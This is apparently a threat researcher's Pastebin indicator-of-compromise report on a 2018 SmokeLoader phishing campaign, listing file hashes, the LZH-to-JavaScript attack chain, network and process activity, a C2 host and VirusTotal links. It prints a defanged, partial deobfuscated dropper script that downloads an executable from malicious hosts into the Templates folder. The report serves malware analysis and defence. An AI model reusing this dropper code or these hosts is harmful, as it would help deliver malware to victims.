SHARE
TWEET

#smokeloader_081118

VRad Nov 9th, 2018 (edited) 132 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #smokeloader #WSH #LZH
  2.  
  3. https://pastebin.com/JmthzrL4
  4. previous contact:
  5. https://pastebin.com/1scwT0f8
  6. https://pastebin.com/MP3kCSSh
  7. FAQ:
  8. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  9.  
  10. attack_vector
  11. --------------
  12. email attach (lzh) > js > WSH > GET > %AppData%\MS\Windows\Templates\*.exe
  13.  
  14. email_headers
  15. --------------
  16. n/a
  17.  
  18. files
  19. --------------
  20. SHA-256 59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d
  21. File name   Рахунки ТОВ Техник.lzh
  22. File size   26.37 KB
  23.  
  24. SHA-256 d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46
  25. File name   11_2018p.xlsx
  26. File size   12.28 KB
  27.  
  28. SHA-256 fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10
  29. File name   pax. 00-128 corp. TEXHIK.xls.js
  30. File size   13.99 KB
  31.  
  32. SHA-256 0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21
  33. File name   sysm.exe    !This program cannot be run in DOS mode.
  34. File size   518.5 KB
  35.  
  36. activity
  37. **************
  38.  
  39. deobfuscated_script
  40. dropper_script:
  41. var wsh = new ActiveXObject("wscript.shell");
  42. var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
  43. try { var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
  44. var sh = new ActiveXObject("shell.application");
  45. HTTP.Open("GET", "h11p:\ districoperav{.} icu/neifo/sysm.exe", false)
  46. else
  47. HTTP.Open("GET", "h11p:\ varanasiclick{.} ru/neifo/sysm.exe", false)
  48.  
  49. netwrk
  50. --------------
  51. wscript.exe 2872    79.133.98.58    80  ESTABLISHED
  52.  
  53. comp
  54. --------------
  55. 79.133.98.58    districoperav{.} icu    GET /neifo/sysm.exe HTTP/1.1    Mozilla/4.0
  56.  
  57. C2  h11p:\ aviatorssm{.} bit/
  58.  
  59. proc
  60. --------------
  61. "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"
  62. "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe"
  63.  
  64. persist
  65. --------------
  66. n/a (detects vm, sleeps)
  67.  
  68. drop
  69. --------------
  70. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe
  71.  
  72. # # #
  73. lzh https://www.virustotal.com/#/file/59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d/details
  74. xlsx    https://www.virustotal.com/#/file/d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46/details
  75. js  https://www.virustotal.com/#/file/fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10/details
  76. url1    https://www.virustotal.com/#/url/d1aef86fefbdd3fa733f4ea8068e038ef5c39e112f50a7ccaedbc1bb2ffcf03a/details
  77. url2    https://www.virustotal.com/#/url/b5758fb74969c0c998286e5bb2c0242e507a1e6037a3785b03edf2174bca878e/detection
  78. exe https://www.virustotal.com/#/file/0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21/details
  79.     https://analyze.intezer.com/#/analyses/08a7d313-03dd-4d6f-9f67-b662f083a559
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top